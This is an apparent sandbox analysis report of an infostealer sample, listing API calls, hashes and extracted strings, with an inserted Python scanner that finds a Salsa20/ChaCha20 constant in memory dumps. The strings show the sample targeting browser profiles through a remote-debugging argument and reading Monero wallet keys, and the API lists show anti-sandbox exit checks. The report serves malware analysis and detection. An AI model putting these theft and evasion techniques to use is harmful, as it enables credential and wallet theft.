                              • API String ID: 3287882509-2579291623
                              • Opcode ID: bab9c5417bcfb1abea9a3e7a797ecfa1e4229d6c71f7fb219c7fde8103f64e62
                              • Instruction ID: cb01dcf89ad75522bc41700d6ac6d8856c558fb21f38a834d67dc1bb7c755f9d
                              • Opcode Fuzzy Hash: bab9c5417bcfb1abea9a3e7a797ecfa1e4229d6c71f7fb219c7fde8103f64e62
                              • Instruction Fuzzy Hash: C11121709004189BCB18FFA8E996AED7339FF50340F804558F91AD7592EF30AB84C693

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1493 811220-811247 call 828b40 GlobalMemoryStatusEx 1496 811273-81127a 1493->1496 1497 811249-811271 call 82dd30 * 2 1493->1497 1499 811281-811285 1496->1499 1497->1499 1501 811287 1499->1501 1502 81129a-81129d 1499->1502 1504 811292-811294 ExitProcess 1501->1504 1505 811289-811290 1501->1505 1505->1502 1505->1504
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0081123E
                              • ExitProcess.KERNEL32 ref: 00811294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827AA0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00827AA7
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00827ABF
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0081112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00811132
                              • ExitProcess.KERNEL32 ref: 00811143
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008110B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008110F7
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              APIs
                                • Part of subcall function 00827A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827AA0
                                • Part of subcall function 00827A70: RtlAllocateHeap.NTDLL(00000000), ref: 00827AA7
                                • Part of subcall function 00827A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00827ABF
                                • Part of subcall function 008279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008111B7), ref: 00827A10
                                • Part of subcall function 008279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00827A17
                                • Part of subcall function 008279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00827A2F
                              • ExitProcess.KERNEL32 ref: 008111C6
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • FindFirstFileA.KERNEL32(00000000,?,00830B32,00830B2F,00000000,?,?,?,00831450,00830B2E), ref: 0081BEC5
                              • StrCmpCA.SHLWAPI(?,00831454), ref: 0081BF33
                              • StrCmpCA.SHLWAPI(?,00831458), ref: 0081BF49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0081C8A9
                              • FindClose.KERNEL32(000000FF), ref: 0081C8BB
                              Strings
                              • Brave, xrefs: 0081C0E8
                              • \Brave\Preferences, xrefs: 0081C1C1
                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 0081C534
                              • Google Chrome, xrefs: 0081C6F8
                              • Preferences, xrefs: 0081C104
                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 0081C3B2
                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 0081C495
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-1869280968
                              APIs
                              • wsprintfA.USER32 ref: 00823B1C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00823B33
                              • lstrcat.KERNEL32(?,?), ref: 00823B85
                              • StrCmpCA.SHLWAPI(?,00830F58), ref: 00823B97
                              • StrCmpCA.SHLWAPI(?,00830F5C), ref: 00823BAD
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00823EB7
                              • FindClose.KERNEL32(000000FF), ref: 00823ECC
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              APIs
                              • wsprintfA.USER32 ref: 00824B7C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00824B93
                              • StrCmpCA.SHLWAPI(?,00830FC4), ref: 00824BC1
                              • StrCmpCA.SHLWAPI(?,00830FC8), ref: 00824BD7
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00824DCD
                              • FindClose.KERNEL32(000000FF), ref: 00824DE2
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008247D0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008247D7
                              • wsprintfA.USER32 ref: 008247F6
                              • FindFirstFileA.KERNEL32(?,?), ref: 0082480D
                              • StrCmpCA.SHLWAPI(?,00830FAC), ref: 0082483B
                              • StrCmpCA.SHLWAPI(?,00830FB0), ref: 00824851
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008248DB
                              • FindClose.KERNEL32(000000FF), ref: 008248F0
                              • lstrcat.KERNEL32(?,015FE4C0), ref: 00824915
                              • lstrcat.KERNEL32(?,015FD278), ref: 00824928
                              • lstrlen.KERNEL32(?), ref: 00824935
                              • lstrlen.KERNEL32(?), ref: 00824946
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 8894df9918513143dc099c88986bb1a1ae51b6277c563462fa14762073c24225
                              • Instruction ID: 34d79264ca1f6cf49e0c17438be3d15e1e7cf9bff1fde38b1f113b051e7c3ef0
                              • Opcode Fuzzy Hash: 8894df9918513143dc099c88986bb1a1ae51b6277c563462fa14762073c24225
                              • Instruction Fuzzy Hash: 645141B19042189BCB24EBB4DC99FED737CFB58300F404598B60AD6190EB749AC58FA1
                              APIs
                              • wsprintfA.USER32 ref: 00824113
                              • FindFirstFileA.KERNEL32(?,?), ref: 0082412A
                              • StrCmpCA.SHLWAPI(?,00830F94), ref: 00824158
                              • StrCmpCA.SHLWAPI(?,00830F98), ref: 0082416E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008242BC
                              • FindClose.KERNEL32(000000FF), ref: 008242D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 2cddb344642f65d7d74bac896641697cb66466609e3d935cf5e9c6d9b9ea88d0
                              • Instruction ID: 2cf97077d3d7175203b2924368130f3cca59fee8c1c17bb39bf99152883fa670
                              • Opcode Fuzzy Hash: 2cddb344642f65d7d74bac896641697cb66466609e3d935cf5e9c6d9b9ea88d0
                              • Instruction Fuzzy Hash: 855145B1904218ABCB24EBB4EC85EEE737CFF58300F404689B61AD6050DB759BC58FA1
                              APIs
                              • wsprintfA.USER32 ref: 0081EE3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0081EE55
                              • StrCmpCA.SHLWAPI(?,00831630), ref: 0081EEAB
                              • StrCmpCA.SHLWAPI(?,00831634), ref: 0081EEC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0081F3AE
                              • FindClose.KERNEL32(000000FF), ref: 0081F3C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 164df83f295d82662260a4b0651f789a6bcf572806099b65e030dc926f4b3475
                              • Instruction ID: 353388fc4d95f62959ee1927b88b777321bc80fc78434b259810c7e6ce35c8ea
                              • Opcode Fuzzy Hash: 164df83f295d82662260a4b0651f789a6bcf572806099b65e030dc926f4b3475
                              • Instruction Fuzzy Hash: 2AE1CF729111289BDB58EB64DDA2EEE733DFF54310F4045D9B50AA2092EE306BC9CF52
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                              • API String ID: 0-1562099544
                              • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                              • Instruction ID: 7241691a41ee4bbc9013d1c2a612ca2618a8e377c1aa3f76a28cd36702fff46b
                              • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                              • Instruction Fuzzy Hash: 8EE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
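The String ID of the record above is the Salsa20/ChaCha20 initialisation constant "expand 32-byte k" seen through its four 32-bit little-endian words ("expa", "nd 3", "2-by", "te k", plus the overlapping partial reads the plugin also lists). Compilers routinely inline that constant as four immediates in the key-setup routine rather than referencing the 16-byte string, which is what the fragmented listing suggests here (an inference from the listing, not something the report states). The scanner below is an added example, not part of the Joe Sandbox report and not code from the sample: it finds the contiguous constant and clustered fragments in a raw dump. The sample dump bytes and the x86 `mov dword` encodings in it are constructed for illustration.

```python
"""Locate the Salsa20/ChaCha20 "sigma" constant in a raw memory dump.

Added example; not from the Joe Sandbox report and not Stealc code.
Finding the constant shows the binary carries a Salsa20/ChaCha20 key setup;
it says nothing by itself about what the cipher is used for (string
decryption, C2 traffic, ...).  That still has to be read from the code.
"""
import struct
from typing import Dict, List

SIGMA = b"expand 32-byte k"                       # 256-bit-key constant
SIGMA_WORDS = struct.unpack("<4I", SIGMA)         # 0x61707865, 0x3320646e, 0x79622d32, 0x6b206574
WORD_BYTES = [struct.pack("<I", w) for w in SIGMA_WORDS]   # b"expa", b"nd 3", b"2-by", b"te k"


def _find_all(buf: bytes, needle: bytes) -> List[int]:
    """All (possibly overlapping) offsets of needle in buf."""
    out, i = [], buf.find(needle)
    while i != -1:
        out.append(i)
        i = buf.find(needle, i + 1)
    return out


def find_sigma(buf: bytes, window: int = 64) -> Dict[str, list]:
    """Scan buf for the sigma constant.

    "string":   offsets of the contiguous 16-byte constant (data section or a
                state block that was already initialised on the stack/heap).
    "words":    offsets of any single 4-byte word.
    "clusters": spans in which all four words occur within `window` bytes.
                A cluster wider than the 16-byte string is what inlined
                immediates in a compiled key-setup routine look like.
    """
    hits: Dict[int, int] = {}                     # offset -> index of the word found there
    for idx, w in enumerate(WORD_BYTES):
        for off in _find_all(buf, w):
            hits[off] = idx
    offsets = sorted(hits)

    clusters = []
    i = 0
    while i < len(offsets):
        start, seen, j = offsets[i], set(), i
        while j < len(offsets) and offsets[j] - start < window:
            seen.add(hits[offsets[j]])
            if len(seen) == 4:                    # all four words present in the window
                clusters.append({"start": start, "end": offsets[j] + 4,
                                 "inlined": offsets[j] - start > 12})
                i = j                             # resume after this cluster
                break
            j += 1
        i += 1
    return {"string": _find_all(buf, SIGMA), "words": offsets, "clusters": clusters}


# Constructed sample dump (assumption: layout chosen for illustration only):
# the constant once as data, then the same four words as x86 immediates.
SAMPLE_DUMP = (
    b"\x90" * 32
    + SIGMA                                       # contiguous constant at offset 32
    + b"\x00" * 16
    + b"\xc7\x00" + WORD_BYTES[0]                 # mov dword [eax],    0x61707865
    + b"\xc7\x40\x04" + WORD_BYTES[1]             # mov dword [eax+4],  0x3320646e
    + b"\xc7\x40\x08" + WORD_BYTES[2]             # mov dword [eax+8],  0x79622d32
    + b"\xc7\x40\x0c" + WORD_BYTES[3]             # mov dword [eax+12], 0x6b206574
    + b"\xcc" * 16
)

if __name__ == "__main__":
    for kind, value in find_sigma(SAMPLE_DUMP).items():
        print(f"{kind:8}: {value}")
```

Run it over the `.sdmp` files the report links (e.g. `find_sigma(open(path, "rb").read())`); a cluster flagged `inlined` points at the key-setup code, while a `string` hit usually points at the constant in `.rdata` or at an already-initialised cipher state.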
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #Iz$+cW~$Co$Gke$N~J+$Z=k7$vHW$vy|~$"{{$&w$m= $H
                              • API String ID: 0-1105423413
                              • Opcode ID: 9554bbda48d545cdc8c5e431877f426fc4a7899b8127161cc28312c11a4e9de7
                              • Instruction ID: 44df45b03a681307b58ffad3d9bea01c827b33e3a7071954bda4f57ea0dd79e9
                              • Opcode Fuzzy Hash: 9554bbda48d545cdc8c5e431877f426fc4a7899b8127161cc28312c11a4e9de7
                              • Instruction Fuzzy Hash: 4AB23AF390C2049FE3046E2DEC8566AFBE9EFD4760F1A853DEAC483744EA7558058693
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008316B0,00830D97), ref: 0081F81E
                              • StrCmpCA.SHLWAPI(?,008316B4), ref: 0081F86F
                              • StrCmpCA.SHLWAPI(?,008316B8), ref: 0081F885
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0081FBB1
                              • FindClose.KERNEL32(000000FF), ref: 0081FBC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 3530e3f4454e609777fd1c42d774fdf3e258a05ed77c2b06335866ea24a3ba62
                              • Instruction ID: 6c6b9b62329cfff14bb075d32d6364878ce7546a4721ed2c300cbb4c3d53e7d4
                              • Opcode Fuzzy Hash: 3530e3f4454e609777fd1c42d774fdf3e258a05ed77c2b06335866ea24a3ba62
                              • Instruction Fuzzy Hash: 91B1F4719001289BCB28FF68ED96AED7779FF54300F4045A8E50AD6191EF315B89CB93
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0083523C,?,?,?,008352E4,?,?,00000000,?,00000000), ref: 00811963
                              • StrCmpCA.SHLWAPI(?,0083538C), ref: 008119B3
                              • StrCmpCA.SHLWAPI(?,00835434), ref: 008119C9
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00811D80
                              • DeleteFileA.KERNEL32(00000000), ref: 00811E0A
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00811E60
                              • FindClose.KERNEL32(000000FF), ref: 00811E72
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmp
